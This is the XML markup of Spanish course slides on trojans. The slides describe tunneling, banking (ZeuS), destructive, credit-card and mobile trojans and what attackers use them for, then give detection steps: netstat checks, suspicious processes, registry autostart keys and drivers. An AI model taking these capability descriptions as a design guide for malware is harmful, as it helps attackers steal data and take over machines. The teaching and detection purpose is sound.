              <a:t>1. Presenta varias técnicas de explotación, creando canales de transferencia de datos arbitrarias para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>enviar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>streams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> autorizados por un sistema de control de acceso a la red.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>2. Habilita a los atacantes de obtener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> externa del servidor desde una red interna y viceversa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>3. Utiliza TCP/UDP/HTTP CONNECT|POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> permitiendo TCP data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>streams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> (SSH, SMTP, POP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>) entre el servidor externo y el interno.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385452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E-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>banking</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Intercepta información de la cuenta de la víctima antes de que se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>cifre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>y la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>envía </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>al comando del troyano del atacante y el centro de control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>ZeuS</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2350630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destructivos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Peligrosos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. Cuando se ejecutan destruyen el S.O. El usuario no podrá iniciar el S.O. Formatea todos las unidades locales y de red.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1586151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de notificación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Envía la locación del IP de la víctima, cuando la víctima se conecta, el atacante recibe la notificación.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273219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Troyanos de tarjetas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>crédito</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Tienen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>un propósito, el de robar la información de la tarjeta de crédito de las víctimas. Engaña a los usuarios con sitios web de bancos falsos para que estos ingresen su información. Los servidores transmiten los datos robados a hackers remotos utilizando mail, FTP, IRC, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97754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Troyanos Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Hiding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> (Troyanos encriptados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>difíciles de detectar, puesto que están encriptados o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>cifran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>información en el sistema, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>cifran </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>comunicaciones.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1694233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Troyano de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Blakberry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>PhoneSnoop</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Activa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>remotamente el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>micrófono </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>blackberry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>escuchando sonidos alrededor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71285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pt-BR" dirty="0"/>
              <a:t>Troyano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> MAC OS X: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>DNSChanger</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dirty="0"/>
              <a:t>Le dice al usuario que se descargó un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>códec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>que al instalarlo hace un DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Poison</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>. Incluso luego ejecuta un video para que no haya sospecha. Posteriormente el atacante es notificado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>mediante </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>un HTTP Post </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> que el equipo fue infectado. Los hackers toman control total del equipo de la víctima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Otro Troyano para MAC es el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Hell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Raiser</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413081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Su propósito</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800" dirty="0"/>
              <a:t>El propósito de los troyanos son variados, por ejemplo, robar información como contraseñas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>códigos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>de seguridad utilizando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>keyloggers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>. Borrar o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>remplazar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>archivos críticos del S.O. Generar tráfico para crear ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>. Descargar spyware, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>adwares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> y archivos maliciosos. Deshabilitar firewalls y antivirus. Capturar pantallas, audio y video. Infectar el equipo como un proxy server. Utilizar el equipo para hacer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>spamm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>blasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> mensajes de correo. Utilizar el equipo como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> para realizar ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180440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smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Escaneando puertos sospechosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Además </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>muestra los binarios que están utilizando los puertos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Otras Herramientas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>IceSword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>CurrPorts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>TCPView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> (GUI)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265616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sz="2800" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Escaneando Procesos sospechosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Por ejemplo vemos que iexplore.exe está en ejecución pero no está abierto... sospechoso</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Otro ejemplo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>spytector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> (o algo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>así) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>utiliza al navegador y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>mailer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> por defecto para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>enviar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>sus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>. El firewall nunca se dará cuenta porque las aplicaciones son legítimas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Herramientas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>What's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Running</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="141727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sz="2800" dirty="0"/>
              <a:t>3. Escaneando entradas al registro sospechosas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>ejecuta automáticamente instrucciones en las siguientes secciones del registro:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>HKEY_CURRENT_USER</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>HKEY_LOCAL_MACHINE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Que contienen: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>RunServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>RunServicesOnce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HKEY_CLASSES_ROOT\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>exefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>\open\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>"%" %*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2847807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4. Escaneando Controladores de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>dispositivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>sospechosos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los Troyanos del tipo drivers son generalmente descargados de fuentes no confiadas. Escanear y verificar que los dispositivos son de una fuente original o sitio original.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Herramientas: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DriverView</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1858798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fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>. Escaneando Servicios de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
